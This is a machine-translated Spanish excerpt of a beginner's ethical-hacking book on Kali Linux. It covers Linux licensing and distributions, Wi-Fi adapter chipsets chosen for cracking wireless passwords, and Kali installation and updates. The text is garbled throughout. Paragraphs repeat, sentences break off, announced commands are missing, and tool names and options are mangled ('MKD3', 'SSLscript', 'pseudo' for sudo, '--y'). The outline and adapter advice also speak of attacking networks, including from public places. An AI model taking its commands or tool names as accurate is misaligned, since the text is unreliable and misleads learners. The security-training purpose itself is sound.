Kali Linux.
Kali Linux.
HACKEO ÉTICO
CON
KALI LINUX
POR
Hugo Hoffmann
Machine Translated by Google
Descargo de responsabilidad
Público objetivo
Este libro está diseñado para cualquier persona que desee convertirse en un hacker ético o
un probador de penetración en el campo de la seguridad de la información. Este libro está
escrito en inglés cotidiano y no se necesita ninguna formación técnica. El contenido de este
libro proporcionará una guía práctica sobre cómo puede usar Kali Linux para implementar
varios ataques en redes cableadas e inalámbricas. Si se está preparando para convertirse
en un profesional de TI, como un hacker ético, un analista de seguridad de TI, un ingeniero
de seguridad de TI, un analista de redes, un ingeniero de redes o un probador de penetración,
pero todavía tiene dudas y quiere saber acerca de la seguridad de la red, encontrará este
libro sumamente útil. Aprenderá conceptos y metodologías clave que giran en torno a la
seguridad de la red, así como las tecnologías clave que debe tener en cuenta. Si está
realmente interesado en convertirse en un hacker ético o un probador de penetración, este
libro es para usted.
Suponiendo que se esté preparando para convertirse en un profesional de la seguridad de la
información, este libro sin duda le brindará excelentes detalles que lo beneficiarán a medida que
ingrese a esta industria.
Machine Translated by Google
Introducción
Primero, vamos a empezar con la Introducción a Linux, para que tengas una idea
general de qué se trata este Sistema Operativo. A continuación, veremos las
mismas recomendaciones de software y hardware para hackers éticos y pasaremos
directamente a la instalación de Vitrual Box y Kali Linux. Este libro trata
principalmente sobre las herramientas de Kali Linux y cómo implementarlas; sin
embargo, primero tenemos que analizar la comprensión de las pruebas de
penetración y cómo funciona con el reconocimiento y la huella. Analizaremos todos
y cada uno de los pasos que debe seguir como probador de penetración, que
incluyen la Etapa 1, la Etapa 2 y la Etapa 3. Esto es importante para que comprenda
cómo asumir un trabajo como hacker ético. Por ejemplo, qué tipo de preguntas
debe hacer cuando un cliente lo contrata. Entonces, en esta sección, vamos a
incluir el qué, el cuándo, el cómo, pero también todos los requisitos legales para que pueda cubri
También vamos a ver los estándares de prueba de penetración para que pueda
decidir cuál le conviene más. A continuación, vamos a comenzar de manera más
práctica al comprender Footprinting y el descubrimiento de hosts con escaneo de
puertos. Después de eso, nos vamos a ensuciar al comprender cómo puede
descubrir dispositivos con Hping3, cómo configurar un proxy para Burp Suite y
cómo apuntar a dispositivos con Burp Scanner. A continuación, veremos algunas
pruebas de aplicaciones, como tokens de sesiones aleatorias, Spidering e inyección
SQL con SQLmap. Luego continuamos y comenzamos a analizar los ataques por
cable e inalámbricos utilizando Kali Linux. Vamos a ver Dictionary Attack con
Airodump-ng, ARP Poisoning con EtterCAP e implementar Passive Reconnaissance.
A continuación, analizaremos la captura de tráfico por cable e inalámbrico mediante
Port Mirroring, la implementación de SYN Scan Attack y el uso de Xplico. A
continuación, implementaremos MITM Attack de varias maneras, como usar Ettercap
o SSLscript. Continuando, aprenderá cómo manipular Packet utilizando la
herramienta llamada Scapy y cómo capturar tráfico IPv6 con Parasite6. A
continuación, vamos a implementar ataques DoS de varias maneras, ya sea
mediante un ataque de desautenticación o creando un punto de acceso no
autorizado o un gemelo malvado con una herramienta llamada MKD3. A
continuación, veremos la implementación de un ataque de fuerza bruta con TCP
Hydra, pero luego veremos la implementación de varios ataques al mismo tiempo
bajo demanda, con algunas herramientas muy poderosas y peligrosas como Hail
Mary de Armitage, The Metasploit Framework o SET (Conjunto de herramientas de
ingeniería social). Estas herramientas están disponibles tanto para la piratería de sombrero blanc
Machine Translated by Google
lo mismo en ambos casos. Lo que debe comprender es que puede conducir a una
situación terrible para la persona que utiliza dichas herramientas de piratería de manera
no autorizada, lo que podría causar daños en el sistema o una interrupción del sistema.
Si intenta utilizar cualquiera de estas herramientas en una red cableada o inalámbrica
sin estar autorizado y perturba o daña cualquier sistema, eso se consideraría piratería
ilegal de sombrero negro. Por lo tanto, me gustaría animar a todos los lectores a
implementar cualquier herramienta descrita en este libro SÓLO PARA USO DE SOMBRERO BLANCO
Cualquier cosa legalmente autorizada para ayudar a individuos o empresas a encontrar
vulnerabilidades e identificar riesgos potenciales está bien. Todas las herramientas que
describiré, debe usarlas solo para mejorar la postura de seguridad. Si está ansioso por
aprender sobre piratería y pruebas de penetración, se recomienda crear un laboratorio
doméstico y practicar el uso de estas herramientas en una red aislada sobre la que
tenga control total y que no esté conectada a ningún entorno de producción ni a Internet.
Si usa estas herramientas para fines de sombrero negro y lo atrapan, será completamente
suyo y no tendrá a nadie a quien culpar. Por lo tanto, nuevamente, le recomiendo
encarecidamente que se mantenga detrás de las líneas, y todo lo que haga debe ser
completamente legítimo y totalmente autorizado. Si no está seguro de nada de lo que
está haciendo y no tiene idea del resultado, pregúntele a su gerente o NO LO HAGA.
Este libro tiene fines educativos. Es para aquellos que están interesados en aprender y
saber qué hay detrás de las cortinas y les gustaría convertirse en un hacker ético o un
probador de penetración. Además de las cuestiones legales, antes de utilizar cualquiera
de las herramientas, se recomienda tener los conocimientos básicos de los conceptos
de redes.
Machine Translated by Google
lo mismo en ambos casos. Lo que debe comprender es que puede conducir a una
situación terrible para la persona que utiliza dichas herramientas de piratería de manera
no autorizada, lo que podría causar daños en el sistema o una interrupción del sistema.
Si intenta utilizar cualquiera de estas herramientas en una red cableada o inalámbrica
sin estar autorizado y perturba o daña cualquier sistema, eso se consideraría piratería
ilegal de sombrero negro. Por lo tanto, me gustaría animar a todos los lectores a
implementar cualquier herramienta descrita en este libro SÓLO PARA USO DE SOMBRERO BLANCO
Cualquier cosa legalmente autorizada para ayudar a individuos o empresas a encontrar
vulnerabilidades e identificar riesgos potenciales está bien. Todas las herramientas que
describiré, debe usarlas solo para mejorar la postura de seguridad. Si está ansioso por
aprender sobre piratería y pruebas de penetración, se recomienda crear un laboratorio
doméstico y practicar el uso de estas herramientas en una red aislada sobre la que
tenga control total y que no esté conectada a ningún entorno de producción ni a Internet.
Si usa estas herramientas para fines de sombrero negro y lo atrapan, será completamente
suyo y no tendrá a nadie a quien culpar. Por lo tanto, nuevamente, le recomiendo
encarecidamente que se mantenga detrás de las líneas, y todo lo que haga debe ser
completamente legítimo y totalmente autorizado. Si no está seguro de nada de lo que
está haciendo y no tiene idea del resultado, pregúntele a su gerente o NO LO HAGA.
Este libro tiene fines educativos. Es para aquellos que están interesados en aprender y
saber qué hay detrás de las cortinas y les gustaría convertirse en un hacker ético o un
probador de penetración. Además de las cuestiones legales, antes de utilizar cualquiera
de las herramientas, se recomienda tener los conocimientos básicos de los conceptos
de redes.
Machine Translated by Google
Tabla de contenido
Capítulo 1 Introducción a Linux
Conclusión
Sobre el Autor
Puede que tengas que pagar por él, pero una vez que sea tuyo puedes hacer lo que
quieras con él. Richard Stallman y su fundación son los autores originales de la GPL
y la Licencia pública general de GNU, que otorga a los usuarios el derecho de hacer
lo que quieran con su software, incluso modificarlo y venderlo, siempre que no hagan
nada cambios en las condiciones originales de la licencia.
El kernel de Linux es la pieza de software más importante publicada en la GPL. Sin
embargo, la Iniciativa de código abierto, si bien coopera con la fundación de software
libre en la medida de lo posible, cree que debería haber acuerdos de licencia más
flexibles si se quiere que el software de código abierto logre el mayor impacto posible
en el mercado de software más grande.
Código abierto significa que el código de programación original de una pieza de
software está disponible para los usuarios, junto con el programa en sí.
Las licencias que se alinean más estrechamente con los objetivos de OSI pero incluyen varias
versiones de Berkeley Software Distribution, también conocido como BSD, que obligan poco más
que las redistribuciones a mostrar el aviso de derechos de autor y el descargo de responsabilidad
del software original.
Esto facilita que los desarrollos comerciales implementen su software modificado bajo
nuevos modelos de licencia sin tener que preocuparse por romper las medidas
anteriores.
Las designaciones FOSS y FLOSS pueden ayudar a reflejar las alteraciones entre
estas dos visiones. FOSS solo implica que el software se puede adquirir de forma
gratuita, aunque FLOSS se centra en lo que puede hacer con
Machine Translated by Google
La licencia Creative Commons autoriza a los creadores de casi cualquier cosa, como software,
películas, música o libros, a seleccionar exactamente los derechos que desean reservar para ellos.
Bajo el sistema Creative Commons, un creador puede elegir manualmente entre cualquier
combinación de los siguientes cinco elementos; atribución, que permite la modificación y
redistribución siempre que se incluya la atribución del creador; compartir por igual, lo que requiere
que las condiciones de la licencia original se incluyan en todas las distribuciones y copias futuras.
A continuación, se denomina "no comercial", que permite solo el uso no comercial; no hay obras
derivadas, lo que permite una mayor redistribución, pero solo copias sin modificar; y el dominio
público, que permite todos los usos posibles.
Cuando se utiliza software publicado bajo Creative Commons, es esencial saber exactamente qué
elementos ha seleccionado el autor. La condición de compartir-igual de creative commons, junto
con la GPL de Stallman, están en términos prácticos, relacionados con el sistema de distribución
de copy left.
Esto puede ser valioso para los autores que no quieren que su software evolucione nunca hacia
tipos de licencia cerrados, pero quieren que sus derivados permanezcan gratuitos para siempre.
Las licencias de código abierto sin copia se denominan con frecuencia licencias permisivas.
De hecho, los productos de muchas de las empresas más grandes y rentables se construyen
utilizando software de código abierto. En muchos casos, las empresas lanzarán libremente su
software como código abierto, además de brindar un servicio premium y
Machine Translated by Google
Por ejemplo, las distribuciones de Ubuntu y CentOS Linux son de ese modelo, porque son compatibles
con Canonical y Red Hat de manera consistente, y ambos están en el negocio de brindar soporte a
clientes empresariales, y estos son negocios muy serios.
Otro ejemplo es Red Hat Linux, que IBM compró por más de $30 mil millones. Vale la pena notar que
la corriente principal de las contribuciones de código de programación al kernel de Linux está siendo
escrita por personal de tiempo completo de grandes empresas de tecnología, incluidas Google y
Microsoft.
Curiosamente, ver la licencia para el usuario del software de código abierto en su dispositivo no
siempre es tan fácil. Las aplicaciones de escritorio con frecuencia harán que su información de licencia
esté disponible a través de las selecciones del menú "ayuda y acerca de", pero en otros casos, la
mejor manera de encontrar información de licencia sobre un producto específico es visitar su sitio web.
El kernel de Linux original fue creado por Linus Torvalds a principios de los 90 y luego donado a la
comunidad. Comunidad significa cualquiera, en cualquier momento y en cualquier lugar, y donado
significa que el código de programación de cualquier componente de Linux estará disponible
gratuitamente para que cualquiera lo descargue, modifique y haga lo que quiera con él, incluso
beneficiarse de sus propias versiones personalizadas si así lo desean. .
Por lo tanto, puede cargar Linux de forma nativa en cualquier computadora o Mac OS, una pequeña
placa de desarrollo que ejecuta un procesador ARM o como una imagen de contenedor virtualizada
dentro de un entorno Docker.
Casi todos los sistemas operativos de escritorio ofrecen dos formas de acceder a sus herramientas a
través de una interfaz gráfica de usuario, también conocida como GUI, y a través de una interfaz de
línea de comandos o CLI.
Todos los sistemas operativos modernos le permiten ejecutar de manera segura y consistente
herramientas sofisticadas de productividad y entretenimiento a través de la GUI y proporcionan un
entorno adecuado donde puede desarrollar su propio software,
Machine Translated by Google
que era lo único que podían hacer las primeras computadoras personales.
Todos los Linux tienen eso en común, pero lo que hacen diferente es lo que es más
interesante. La diferencia más obvia entre Linux y sus competidores comerciales son las
limitaciones comerciales.
Otros los tienen, y Linux no. Esto significa que puede instalar tantas versiones de Linux en
tantos dispositivos de hardware como desee, y nadie le dirá lo contrario.
Esta libertad cambia la forma en que usará su sistema operativo porque le brinda flexibilidad
para realizar los cambios y las personalizaciones que mejor se adapten a sus requisitos.
No es inusual tomar un disco duro con un sistema de archivos Linux instalado desde una
computadora y colocarlo en otra, y funcionará bien al contrario con Windows o Mac OS.
A menudo tengo hasta media docena de instancias virtuales y físicas de Linux ejecutándose
al mismo tiempo mientras pruebo varios procesos de software y diseño de red, algo que
quizás nunca intentaría si necesitara obtener licencias separadas.
Esto debería tener dos ventajas inmediatas para usted. Primero, puede pasar mucho tiempo
experimentando con varias distribuciones y escritorios de Linux a medida que aumentan sus
habilidades con Linux y, naturalmente, puede iniciar una implementación de prueba antes
de lanzar los nuevos recursos basados en Linux de su empresa para asegurarse de que
funcionan correctamente.
El entorno Linux contiene tres tipos de software; el kernel de Linux, la interfaz de escritorio,
como GNOME o Cinnamon, y las personalizaciones proporcionadas por su distribución
específica, como Ubuntu o Red Hat.
Para mantener la estabilidad, no es inusual que las distribuciones ignoren en gran medida
las nuevas versiones del kernel no críticas durante muchos meses. Las distribuciones, en
particular las más grandes y conocidas, se actualizan comúnmente, mientras que los parches
de seguridad y funciones críticas están disponibles casi al instante.
Además del sistema operativo, hay miles de paquetes de software gratuitos disponibles que le permiten
realizar cualquier tarea informática factible, de manera más rápida y segura que en otras plataformas.
Ya sea que esté buscando suites de productividad de oficina o servidores web y servicios de seguridad,
todo estará integrado en la estructura del sistema Linux por administradores de paquetes confiables.
Por ejemplo, si desea usar un software de edición como Adobe en Windows o Mac, para que funcionen
de manera efectiva sin ralentizar el sistema, necesitará una CPU rápida, 32 GB de RAM y una RAM de
video dedicada.
Estas plataformas pueden costar miles de dólares y requieren sistemas de enfriamiento para evitar que
se derritan. Sin embargo, si usara Linux, podría ejecutar procesos virtualizados, junto con tareas diarias
regulares en una PC simple, construida con menos de $ 300.
Dado que Linux es de código abierto, muchas personas han creado sus propias versiones del sistema
operativo, conocidas como distribuciones o "distribuciones" para satisfacer necesidades especializadas.
El más famoso de estos es el sistema operativo Android de Google para teléfonos inteligentes, pero hay
cientos de otros, incluidas las distribuciones de implementación empresarial, como Red Had Enterprise,
y su reconstrucción comunitaria gratuita, CentOS, por ejemplo.
Hay una distribución especialmente optimizada para aplicaciones científicas y matemáticas avanzadas
llamada Scientific Linux, Kali Linux para pruebas y administración de seguridad de red, en la que
profundizaremos en breve, pero otras distribuciones creadas para integrarse en dispositivos IoT o
Internet de las cosas como Raspbian para la placa de desarrollo ultra económica Raspberry Pi.
Las distribuciones a menudo se agrupan en familias. Por ejemplo, una distribución específica puede
ganar reputación por su estabilidad, buen diseño, parches rápidos y un ecosistema saludable de
software de terceros.
En lugar de tener que reinventar la rueda, otras comunidades podrían bifurcar versiones derivadas de
esa distribución principal y sus propias personalizaciones, y distribuirlas con un nuevo nombre, pero la
relación padre-hijo original permanece.
Machine Translated by Google
Las actualizaciones y los parches se envían desde el padre ascendente hacia abajo a todos los
secundarios. Esta es una forma eficiente y efectiva de mantener sistemas autónomos.
Las familias de distribución más conocidas son Debian, que mantiene un ecosistema descendente
que incluye Ubuntu para todo uso, por ejemplo.
Mint Kali Linux y Red Hat son los responsables de CentOS; y distribuciones de Fedora centradas en
el consumidor; SUSE, que proporciona OpenSUSE; y Arch Linux, infamemente complejo pero
ultraeficiente, cuyos seguidores posteriores incluyen LinHES para la gestión de entretenimiento en
el hogar y el Manjaro centrado en GUI.
Los contenedores de Docker son rápidos y eficientes porque comparten el kernel del sistema
operativo con sus entornos de host de Linux y se pueden construir utilizando una amplia gama de
imágenes basadas en Linux.
La nube, liderada por AWS o Amazon Web Services y Azure, el servicio de computación virtualizado
bajo demanda es simplemente genial, ya que contiene todo lo que sabemos sobre computación.
Linux es multipropósito y gratuito, por lo que es el sistema operativo perfecto para implementaciones
en la nube. Se está utilizando otra versión de Linux para ejecutar una gran mayoría de las
ocurrencias en la nube alojadas en la plataforma de nube Azure de Microsoft.
Estas distribuciones especializadas incluirán con frecuencia funciones listas para usar que le
permitirán aprovechar su entorno de alojamiento en la nube específico.
Estas distribuciones incluyen la AMI de Amazon Linux de AWS, por ejemplo.
AMI significa Amazon Machine Image y las versiones de Ubuntu de soporte a largo plazo
especialmente diseñadas. El soporte a largo plazo o las versiones LTS están diseñadas para ser
igual de estables utilizando software y configuraciones completamente probados.
5 años.
Puede implementar una versión LTS como servidor sin preocuparse de reconstruirlo todo
ese tiempo. Si desea probar las últimas y mejores versiones del software, puede continuar
e instalar la versión provisional más reciente, pero para entornos estables, debe tener un
LTS.
Las licencias Creative Commons permiten condiciones de licencia más restrictivas para
dar más opciones a los creadores de software. Otros modelos de licencia importantes
incluyen Apache, BSD y MIT.
Linux es una plataforma flexible que se puede personalizar para alimentar cualquier
dispositivo informático, tanto; físicos o virtuales. Aprendió acerca de las distribuciones de
Linux que empaquetan el kernel de Linux, junto con escritorios de GUI y software y
configuraciones especializados.
Las familias de distribución que analizamos incluyen Red Hat Enterprise Linux, Debian y
Arch. En conclusión, ahora tiene una comprensión básica sobre las formas en que las
distribuciones parchean y mantienen el software en las máquinas Linux, así como
también cómo hacen que las nuevas versiones estén disponibles con frecuencia, incluidas
las versiones LTS o Long Term Support.
Antes de instalar Linux, quiero decir que la instalación de Linux no es una misión simple.
Hay tantas plataformas en las que puede instalar Linux, tantas distribuciones y
lanzamientos de distribuciones y cada una con su propio programa de instalación, tantas
opciones de configuración y tantas rutas de instalación únicas y diferentes que presentan
un pequeño subconjunto del tema de una manera lógica. camino es un desafío.
¿Qué pasa con un refrigerador o algo más pequeño como un juguete para niños, que es
probable que se produzca en grandes cantidades, o servidores virtuales que están
diseñados para vivir durante unos segundos, realizar una tarea específica sensible al tiempo y
Machine Translated by Google
En el caso del Pi, puede crear una imagen del sistema operativo en su propia PC y grabarla en
una tarjeta SD, que luego puede insertar en el dispositivo y arrancarlo. Los servidores virtuales
se pueden aprovisionar mediante scripts que definen el sistema operativo preciso y los detalles
de configuración que busca.
Hablemos de esos uno a la vez. Las distribuciones de Linux le permiten elegir interactuar con
la GUI usando cualquiera de los idiomas, pero deberá especificar qué idioma desea y qué
diseño de teclado está usando.
El idioma que elija determinará lo que verá en los cuadros de diálogo y los menús de
configuración en todo el escritorio. También deberá configurar su ubicación, para que Linux
sepa su zona horaria.
Si es posible, es mejor que habilite el acceso a Internet antes de que comience la instalación.
De esta manera, su distribución puede descargar las últimas actualizaciones que podrían no
estar incluidas en su archivo de instalación, por lo que tendrá una menos.
Machine Translated by Google
Si bien no está obligado a crear un usuario regular, para fortalecer su postura de seguridad, se
recomienda encarecidamente que evite iniciar sesión como usuario "raíz" para las operaciones
normales.
Como alternativa, es mucho mejor iniciar sesión y hacer su trabajo como un usuario normal que
puede, cuando sea necesario, invocar poderes de administración usando pseudo.
Los procesos de instalación estándar de Ubuntu, por ejemplo, ni siquiera ofrecerán la opción de
usar la raíz. Siempre puede optar por el enfoque predeterminado para dispositivos de
almacenamiento donde, en la mayoría de los casos, todo el sistema de archivos se instalará en una
sola partición, pero es posible que desee explorar otras opciones para casos de uso más
complicados o inusuales.
Puede usar una unidad de estado sólido o SSD pequeña pero rápida para la mayoría de los
archivos del sistema, mientras que los directorios "inicio" y "var" más grandes se montan en un
disco duro más grande, pero mucho más lento.
Esto le permite aprovechar la velocidad de la SSD para ejecutar binarios de Linux mientras se sale
con la suya con un disco duro magnético menos costoso para sus datos, donde la diferencia de
rendimiento no sería tan notable.
Bueno, LVM son las siglas de Logical Volume Manager, que es una forma de virtualizar dispositivos
de almacenamiento, para que sean fáciles de manipular más adelante. ¿Pero cómo funciona?
Bueno, imaginemos que tiene tres unidades físicas separadas en su sistema. LVM los convertiría a
todos en un solo grupo de volúmenes, cuya capacidad es igual al espacio agregado total de las tres
unidades.
En cualquier momento, podrá crear tantos volúmenes lógicos de ese grupo de volúmenes como
desee, utilizando cualquier combinación de capacidad individual, hasta
Machine Translated by Google
Si sus 3 unidades tenían un tamaño de 2 TB, 500 GB y 200 GB por separado, y necesitaba
trabajar con una unidad de datos de al menos 2,3 TB, podría usar LVM para crear 1
volumen lógico de 2,3 TB y un segundo volumen de 400 GB para todo lo demás.
Ahora que conoce parte de la teoría, puede continuar y saltar directamente a la instalación
de Kali Linux, pero antes de hacerlo, me gustaría recomendar algunos otros software y
hardware que debería obtener como Pen Tester.
Machine Translated by Google
Tcpdump
https://www.tcpdump.org/
LanDetective
https://landdetective.com/download.html
Analizador
de canales https://www.metageek.com/support/downloads/
Ettercap
https://www.ettercap-project.org/downloads.html
NetworkMiner
https://www.netresec.com/?page=NetworkMiner
Violinista
https://www.telerik.com/fiddler
Wireshark
https://www.wireshark.org/download.html
Kali Linux
https://www.kali.org/downloads/
vmWare
https://my.vmware.com/web/vmware/downloads
Caja virtual
https://www.virtualbox.org/wiki/Downloads
Machine Translated by Google
Podría estar pensando que su computadora portátil ya tiene esto y sí, la mayoría de las
computadoras portátiles y los teléfonos inteligentes ya tienen esto incorporado. Pero hay dos
problemas con eso.
El primer problema es que no puede acceder a los adaptadores inalámbricos integrados con Kali
Linux si está instalado como una máquina virtual, y el segundo problema es que estos adaptadores
inalámbricos integrados no son buenos para penetrar en las redes inalámbricas.
Incluso si instaló Kali Linux como una máquina principal en su computadora portátil y luego tendrá
acceso a su tarjeta inalámbrica incorporada, aún desea poder usar este adaptador inalámbrico
para pruebas de penetración porque no es compatible con el modo de monitor. o inyección de
paquetes.
Desea poder usarlo para descifrar contraseñas de Wi-Fi y hacer todas las cosas increíbles que
podemos hacer en Kali Linux con aircrack-ng y otras herramientas.
Antes de comenzar a hablar sobre las marcas y los modelos que funcionarán con Kali Linux,
quiero hablar sobre un factor más importante que es el conjunto de chips que se usa dentro del
adaptador inalámbrico.
Olvídate de la marca por ahora. En cambio, vamos a hablar sobre el cerebro que hace todos los
cálculos dentro del adaptador inalámbrico. Esto es lo que determina si el adaptador es bueno o
malo. Ya sea que admita el modo de inyección y monitoreo y funcione con Kali Linux, la marca es
irrelevante.
Lo que se usa dentro de ese adaptador es importante y, por lo tanto, el conjunto de chips. Hay
muchos conjuntos de chips que admiten el modo de monitor y la inyección de paquetes y Kali
Linux. Hay uno que está hecho por la compañía llamada Atheros y su modelo es AR9271. Este
conjunto de chips admite el modo de monitor o la inyección de paquetes, o puede usar el conjunto
de chips para crear un punto de acceso falso, o puede usarlo para piratear redes.
Por lo tanto, puede usar este conjunto de chips para hacer prácticamente todos los ataques de Kali Linux. los
Machine Translated by Google
El único problema con este conjunto de chips es que solo admite 2,4 gigahercios, por lo que si
su objetivo usa 5 gigahercios o algunos de los dispositivos están conectados a través de 5g,
entonces no podrá comunicarse con estos dispositivos.
Ni siquiera podrás verlos, por lo que no podrás lanzar ataques contra ellos. Eso no es porque el
conjunto de chips no sea bueno, sino porque no puede ver el tráfico de 5 gigahercios.
Si desea obtener un adaptador que use este conjunto de chips, tiene dos opciones. Bueno, tienes
muchas opciones, pero te voy a hablar de dos. Primero, hay una opción económica que puede
obtener un adaptador inalámbrico sin marca que usa este conjunto de chips y puede usarlo para
realizar todos los ataques que acabo de mencionar.
Lo único es que este adaptador no tiene marca, por lo que es un poco más económico. La
segunda opción es obtener el adaptador inalámbrico Alpha AWUS036NHA fabricado por alpha,
que es una empresa muy popular y sigue fabricando excelentes adaptadores inalámbricos.
Ambos funcionan muy bien, pero la única diferencia es que el adaptador Alpha tiene un mayor
alcance y es más confiable. Los adaptadores económicos son mucho más pequeños, mucho
más compactos, por lo que si estás en un lugar público, es mucho más fácil de usar que el Alpha,
que es grande y tiene una gran antena.
El siguiente conjunto de chips del que quiero hablar está hecho por la compañía llamada Realtek.
El modelo es RTL8812AU. Este conjunto de chips solo recibió soporte de Kali Linux en la versión
1 de 2017 y este conjunto de chips admite el modo de monitor, la inyección de paquetes y
también la frecuencia de 2,4 y 5 gigahercios.
El único problema con este conjunto de chips es que no parece tan confiable, ya que algunos de
los ataques pueden necesitar una señal más fuerte, algunos de los ataques fallarán y tendrá que
volver a hacerlo y, a veces, la tarjeta simplemente se desconectará. entonces tienes que
conectarlo de nuevo.
Este chipset tiene una vez más dos opciones. Puede obtener un adaptador inalámbrico económico
que es mucho más barato que el Alpha, y solo tiene el mismo conjunto de chips, o puede obtener
el Alpha, que es una muy buena compañía con una buena reputación y es un adaptador más
fuerte, por lo que llegar a más lejos
Machine Translated by Google
Con el adaptador Alpha que usa este chipset es Alpha AWUS036ACH. Puede seguir
adelante y comparar sus especificaciones y obtener el adecuado para usted.
Lo más importante es el chipset. No es la marca. Los económicos son mucho más baratos.
Son más compactos, por lo que son mejores. Puedes usarlos mejor en público pero no
son tan fuertes como los Alpha. Los alfa le darán una mejor señal, por lo que serán más
confiables, pero los económicos también funcionarán perfectamente bien. Todos soportarán
muchos ataques de penetración.
Una vez que haya descargado Virtual Box, podrá crear y ejecutar múltiples VM-s
(máquinas virtuales). Los manuales de usuario sobre cómo instalar Virtual Box, están
todos en su sitio web que ya se enumeran en el capítulo anterior. Usar el software es
simple y se recomienda ejecutar Kali Linux en él.
Puede usar otro entorno virtual similar, como vmWare, pero personalmente he usado
Virtual Box durante muchos años, por lo tanto, eso es a lo que me referiré en este libro.
Kali Linux es una distribución de Linux del sistema operativo que puede usar como su
sistema operativo principal o ejecutar virtualmente. Puedes ejecutarlo en forma de DVD,
o incluso desde USB. Una vez que haya descargado el archivo ISO, puede instalarlo en
la parte superior de su sistema operativo existente.
Kali Linux es el mejor kit de herramientas / software de prueba de penetración que tiene
cientos de herramientas integradas, listas para usar para pruebas de penetración en
cualquier red. Kali Linux es para probar una red existente e intentar encontrar posibles
vulnerabilidades, para que se pueda mejorar la seguridad general de la red.
Kali Linux también es fácil de usar, y las categorías de herramientas integradas son para
recopilación de información, análisis forense, ingeniería inversa, pruebas de estrés,
evaluación de volnerabilidad, herramientas de informes, herramientas de explotación,
cálculo de privilegios, mantenimiento de acceso y mucho más.
Una vez que haya descargado Kali Linux y esté listo para instalarlo en un entorno virtual,
hay algunos detalles que debe tener en cuenta. Cuando crea una nueva máquina virtual
para Kali, debe asignar al menos 4 Gb de espacio y otros 20 Gb para el disco duro virtual.
Una vez que haya creado una nueva máquina virtual completa, debe ir a la configuración
y asegurarse de ajustar la configuración de red eligiendo conectar la máquina virtual a su
enrutador. Una vez que haya terminado con la configuración, debería estar
Machine Translated by Google
luego presione enter. Esto comenzará a instalar la GUI (interfaz gráfica de usuario) desde el
disco duro, que también se recomienda. Hasta que se instale la GUI, hay algunas preguntas que
debe responder, como el idioma, el teclado, la ubicación y la configuración del reloj para la zona
horaria.
Una vez completada la instalación, debe reiniciar la imagen para que arranque desde el disco
duro. Después de que se complete el reinicio, Kali solicitará los detalles de inicio de sesión en la
CLI (interfaz de línea de comandos). Para el nombre de usuario, escriba
"raíz"
y pulsa enter. Si es nuevo en CLI y no conoce ningún comando ni qué escribir, no se preocupe.
Siempre puede cambiar a la GUI escribiendo el comando
"startx"
y pulsa enter. Esto abrirá la GUI fácil de usar que le permitirá tener acceso a todas las
herramientas de Pen Test que discutiremos más adelante. Otra configuración básica que debe
realizar es el direccionamiento IP.
Kali Linux por defecto busca una dirección IP de su DHCP, pero se recomienda asignar una
dirección IP estática, para que no se pierda qué IP representa qué máquina. El comando CLI que
necesita para asignar una dirección IP en Kali es:
Una vez que se completan estas configuraciones, haga ping a la dirección IP de su enrutador escribiendo
el comando:
"Ping 10.10.10.1"
Machine Translated by Google
Una vez que tenga accesibilidad a su puerta de enlace predeterminada y pueda acceder a Internet
con ese enrutador, debe probar la conectividad a Internet escribiendo el comando:
Si esto tiene éxito, significa que su Kali Linux virtualmente instalado está conectado a Internet. La
razón por la que necesita acceso a Internet es porque desea actualizar su Kali Linux.
Actualizar su Kali Linux es su máxima prioridad. La primera tarea que debe realizar después de una
instalación limpia es actualizar su sistema operativo. Advanced Packaging Tools, también conocido
como APT, amplía las funcionalidades de los paquetes de Debian al buscar repositorios e instalar
o actualizar paquetes junto con todas las dependencias requeridas.
Abra su consola y escriba "apt-get update", que se usa para volver a sincronizar los archivos de
índice del paquete local con su fuente como se define en el archivo de lista de fuentes. El comando
de actualización siempre debe usarse primero, antes de realizar una actualización o una
actualización de distribución.
A continuación, debe actualizar Kali emitiendo la opción "--y", que continúa con la instalación sin la
molestia de escribir sí cada vez. Entonces, ¿qué significa apt-get upgrade?
Bueno, se usa para instalar las versiones más nuevas de todos los paquetes instalados en el
sistema. Entonces se actualizan los paquetes existentes en Kali con nuevas versiones disponibles.
Es importante tener en cuenta que el comando de actualización no cambiará ni eliminará paquetes
que no se estén actualizando, y no instalará paquetes que aún no estén presentes.
Por último, debe ejecutar el comando "actualización de distribución". Este comando actualiza todos
los paquetes actualmente instalados en el sistema y sus dependencias.
También elimina paquetes obsoletos del sistema. Lo siguiente que debe hacer es reiniciar su
máquina. Después de reiniciar su máquina, ahora tiene una versión nueva y limpia de Kali.
Para enumerar los paquetes de Debian instalados en su máquina, debe ejecutar el siguiente
comando: “sudo apt list –installedX”
Y finalmente, para eliminar un paquete de Kali, debe ejecutar el siguiente comando; "sudo
apt-get remove name ÿ un-install package" Por supuesto, debe reemplazar el nombre del
Puede echar un vistazo a ese archivo abriéndolo con el panel de hojas cada vez que ejecuta
su comando de actualización, Kali busca en el contenido de este archivo para realizar el
proceso de actualización.
Actualizar su Kali Linux es su máxima prioridad. La primera tarea que debe realizar después
de una instalación limpia es actualizar su sistema operativo. Advanced Packaging Tools,
también conocido como APT, amplía las funcionalidades de los paquetes de Debian al
buscar repositorios e instalar o actualizar paquetes junto con todas las dependencias
requeridas.
Abra su consola y escriba "apt-get update", que se usa para volver a sincronizar los archivos
de índice del paquete local con su fuente como se define en el archivo de lista de fuentes.
El comando de actualización siempre debe usarse primero, antes de realizar una
actualización o una actualización de distribución.
A continuación, debe actualizar Kali emitiendo la opción "--y", que continúa con la instalación
sin la molestia de escribir sí cada vez. Entonces, ¿qué significa apt-get upgrade?
Bueno, se usa para instalar las versiones más nuevas de todos los paquetes instalados en
el sistema. Entonces se actualizan los paquetes existentes en Kali con nuevas versiones
disponibles. Es importante tener en cuenta que el comando de actualización no cambiará ni
eliminará paquetes que no se estén actualizando, y no instalará paquetes que aún no estén
presentes.
Por último, debe ejecutar el comando "actualización de distribución". Este comando actualiza
todos los paquetes actualmente instalados en el sistema y sus dependencias.
También elimina paquetes obsoletos del sistema. Lo siguiente que debe hacer es reiniciar
su máquina. Después de reiniciar su máquina, ahora tiene
Machine Translated by Google
Para enumerar los paquetes de Debian instalados en su máquina, debe ejecutar el siguiente
comando: “sudo apt list –installedX”
Si hay muchos de ellos y desea saber si una herramienta específica ya está instalada, puede
filtrar los resultados agregando el argumento "filtro grep".
Para mostrar una descripción completa de un paquete e identificar sus dependencias, ejecute
